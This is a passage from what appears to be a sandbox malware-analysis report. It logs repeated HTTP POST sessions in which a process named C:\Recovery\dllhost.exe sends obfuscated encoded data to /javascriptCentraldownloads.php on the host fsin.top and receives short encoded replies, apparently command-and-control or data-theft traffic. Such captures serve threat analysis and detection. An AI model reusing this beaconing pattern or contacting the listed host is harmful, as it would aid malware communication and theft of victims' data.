                                                  Aug 1, 2024 07:37:49.613605976 CEST1284OUTData Raw: 51 54 58 50 5a 5f 58 5c 5c 5e 5a 51 54 5e 57 55 57 55 5e 5c 56 54 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXPZ_X\\^ZQT^WUWU^\VTQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_'2!\5<]'&'X<>)&"]1%/=%3;=#^!%&G#.X!
                                                  Aug 1, 2024 07:37:49.701117039 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:49.961678982 CEST733INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4B2Xf5nXj9D%2BLSYUI6OtS07nU33dwJEMAE3sJAeA30CHQu%2FVc49TNybCpuYk0DWRQ6fO5ijzJD9MM91mxNs7O%2FxEuEKpLZj2oPuYiDk2QvKWbGkZJ5lgWcObg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a7d5fb88c71-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 08 26 2b 3e 50 21 5c 3b 0b 3d 31 36 0a 3e 23 38 19 28 5f 3b 58 32 05 36 01 26 16 05 0b 22 3c 29 5b 26 3f 2e 12 25 31 2a 5f 3d 27 21 51 04 11 25 03 37 33 3a 5f 2a 3a 3b 59 27 01 3f 59 34 18 02 11 27 1d 29 1c 21 17 30 5d 29 54 25 1e 3c 22 0d 56 2d 3b 0a 00 3c 0d 20 10 25 0c 2a 56 0d 17 22 51 39 38 28 1e 30 54 2f 0f 23 12 06 0f 21 3b 39 10 28 3f 36 10 29 1a 3a 5f 2d 1d 0d 12 2a 0a 22 51 2b 5b 3d 12 3c 14 0c 09 26 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!&+>P!\;=16>#8(_;X26&"<)[&?.%1*_='!Q%73:_*:;Y'?Y4')!0])T%<"V-;< %*V"Q98(0T/#!;9(?6):_-*"Q+[=<&)"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.449769172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:49.405750036 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:49.755928040 CEST1012OUTData Raw: 51 52 58 51 5a 55 5d 56 5c 5e 5a 51 54 5e 57 50 57 50 5e 5c 56 5c 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXQZU]V\^ZQT^WPWP^\V\QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!':#>$$5#?.R)Y%,&/>$3?,./_#+42%&G#.X!
                                                  Aug 1, 2024 07:37:49.860584021 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:50.019757032 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COmOzvSfSuZJte%2FpWL%2BYbBZj%2BiWhUlxGZwKzc9RFVuOGAQpgGgzXnjr3daRYdzISa6rYHI%2B8cIM6%2Fv9r2ENYGdFgBZ9CggFG3by5eiBLWysONpaeDf9CBonlyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a7e5f9b42ee-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  34192.168.2.449770172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:50.156806946 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:50.505855083 CEST1012OUTData Raw: 54 50 58 54 5a 59 58 5d 5c 5e 5a 51 54 54 57 55 57 54 5e 5e 56 5c 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TPXTZYX]\^ZQTTWUWT^^V\Q^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"_32&!+35]<;R?652;+&^%4,.#"^;%%&G#.X!,
                                                  Aug 1, 2024 07:37:50.604068041 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:50.837636948 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xpDX7gSpeN%2B4G064r8aZb4DlxsxBQzSLT6CRmIsO%2FglrE5OCZCg7ZtJjsBO5eLAwWLulJV4y%2FGzfzhOmeFloQF1nlbItpGnSO1LF6DlRflsmvJvpGFQKAPXEYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a82fc0543e2-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  35192.168.2.449771172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:50.970491886 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:51.318335056 CEST1012OUTData Raw: 51 54 58 51 5f 58 5d 53 5c 5e 5a 51 54 57 57 50 57 5f 5e 5c 56 55 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXQ_X]S\^ZQTWWPW_^\VUQ\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"':6-8X$%#(+"U>5*Y%'W'/>_&V,"+'X15&G#.X!
                                                  Aug 1, 2024 07:37:51.419668913 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:51.658006907 CEST580INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSaoL4WRo0j6cP094htyu05FNSE%2FH3Wzw51bOiQzurbLiEKDEK6Bal1ET9LOoPjL29rqAq5Lm2uF34cYbJwnHJi3zPYjhmluYnucCTknm7U3tGIdnS5LMGEqhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a881def18ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0
                                                  Aug 1, 2024 07:37:51.878266096 CEST580INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:51 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSaoL4WRo0j6cP094htyu05FNSE%2FH3Wzw51bOiQzurbLiEKDEK6Bal1ET9LOoPjL29rqAq5Lm2uF34cYbJwnHJi3zPYjhmluYnucCTknm7U3tGIdnS5LMGEqhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a881def18ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.449772172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:51.964507103 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:52.318583012 CEST1012OUTData Raw: 54 50 5d 57 5a 5e 58 53 5c 5e 5a 51 54 50 57 55 57 54 5e 5e 56 5e 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TP]WZ^XS\^ZQTPWUWT^^V^Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^$&#=?';(*U?&)&#V%$0<->#]"1&G#.X!<
                                                  Aug 1, 2024 07:37:52.414946079 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:52.666259050 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2FsPfR8wWrNyWnGFpWXfLDihOyNkNY2l5Ioq7K9omeqLbnatTfBtLpT2jEPVAHZU1lAL%2Bd9jJfp5%2BPhaAxjNJCOELO3%2BU8e7Li8zVopXKVCwTXK2dDLsuQBk8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a8e4eac2369-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  37192.168.2.449773172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:52.792702913 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1008
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:53.146537066 CEST1008OUTData Raw: 51 50 5d 52 5a 5f 58 52 5c 5e 5a 51 54 56 57 50 57 50 5e 5d 56 54 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QP]RZ_XR\^ZQTVWPWP^]VTQY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X3"!> Z'5/])81>6%/W%?>Z&37,-;_!+?1&G#.X!(
                                                  Aug 1, 2024 07:37:53.247885942 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:53.491926908 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro2TiGM12Cy765WPgMI8yLJrRlbHnkXJ%2BubWFVEfjMpFgGnVd0GixKLDDD%2FG%2FjEk3dxOyOGNQM0gjqURhSNowaksKIQD%2FEQPlOdGa3IDCH8%2Fg0CrM%2BiQVBcSuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a938e93440c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  38192.168.2.449774172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:53.628781080 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:53.977945089 CEST1012OUTData Raw: 51 54 5d 55 5a 55 58 55 5c 5e 5a 51 54 5e 57 53 57 5f 5e 5f 56 5d 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QT]UZUXU\^ZQT^WSW_^_V]QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^'>!>(]$6,(>U?%)%(P&,)13$8> 54%&G#.X!
                                                  Aug 1, 2024 07:37:54.107278109 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:54.352653027 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsG9zct8mhI14%2Febw%2FQMGrF9PT5KvSwObkRJGPXu82u6N4fTjoted7MVycOkg3sn3W%2FNwZdRSWBw7prNS7lw2GWUureG%2F0T0ut4a66IIOaFiPybquWPgQyb4zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37a98ee3b178c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  39192.168.2.449775172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:54.638870955 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  40192.168.2.449776172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:54.982044935 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1272
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:55.333956957 CEST1272OUTData Raw: 51 52 58 56 5f 5f 58 57 5c 5e 5a 51 54 56 57 54 57 50 5e 56 56 5b 51 5c 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QRXV__XW\^ZQTVWTWP^VV[Q\[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"['"36;X?].).&(8&.$#3,. 54&5&G#.X!
                                                  Aug 1, 2024 07:37:55.427525997 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:55.687798023 CEST737INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeHCISLuF6%2BTCprG5jOzBqmf7chW%2Fynl9lTV8pwxQyWQwwRfH%2FlKjh9lNt1LCqnl7ndb5TFE9IRISiC68jzOA43ue53GTrldNbL%2Buu6nnS0NhOzCbgEfy%2FqxOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa12d9241d3-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 22 13 24 28 3e 51 36 39 20 51 3d 0b 21 1b 2a 23 2b 03 28 07 2f 5c 26 2f 36 00 31 5e 3c 57 21 3f 39 5b 24 3f 22 55 26 22 2d 06 3d 0d 21 51 04 11 26 5f 37 30 2d 04 2b 39 28 02 27 01 27 59 37 35 2c 12 30 33 22 0f 22 00 37 00 3e 32 25 13 28 1c 23 1e 2e 05 23 17 2b 1d 05 05 32 26 2a 56 0d 17 21 0f 2c 3b 38 51 24 32 0e 1c 23 3f 38 0e 20 15 39 11 29 11 2a 10 3e 27 26 5a 2e 23 20 02 29 55 21 0b 3c 13 25 1d 28 3a 2e 08 30 03 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98"$(>Q69 Q=!*#+(/\&/61^<W!?9[$?"U&"-=!Q&_70-+9(''Y75,03""7>2%(#.#+2&*V!,;8Q$2#?8 9)*>'&Z.# )U!<%(:.0"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  41192.168.2.449777172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:55.101027966 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:37:55.459029913 CEST1012OUTData Raw: 54 56 5d 56 5a 5b 5d 54 5c 5e 5a 51 54 57 57 53 57 5e 5e 5c 56 58 51 5e 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]VZ[]T\^ZQTWWSW^^\VXQ^[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!'T9_"[7&5](])):^%;8114/'!+;Y&&G#.X!
                                                  Aug 1, 2024 07:37:55.548077106 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:55.783210993 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FR2Lp9HKjfute6VgQq9pn7xzfsoW1i%2BT1EfqVP3%2FFqfJU%2FhLW4%2BLd8X2HIidsmdZkLs4D3JxvT%2FInsU89NV9zqRAJfa57ndzxIUmvNTU8R7zLsmxJVvg77vCkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa1e82818ea-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  42192.168.2.449778172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:55.914935112 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:37:56.271452904 CEST1012OUTData Raw: 51 57 5d 57 5a 59 58 53 5c 5e 5a 51 54 51 57 52 57 5f 5e 56 56 5d 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QW]WZYXS\^ZQTQWRW_^VV]QZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!%""6$36#]<6>6%17R&<.^%$,>;!/%&G#.X!
                                                  Aug 1, 2024 07:37:56.368602991 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:37:56.518285990 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:37:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idH4CwXNrioM7UyQABb2ffMV0om5nbdQk8inG6zR1IjJ2C6QJCPxjeMeKlFjvgRBWmz7vdUvvG4JeuF3zamhasHwyr60phKKAs7Oy51kKb2NG35P%2BDb8X%2BNukQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37aa70e5d41ff-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  43192.168.2.449779172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:37:56.784178019 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
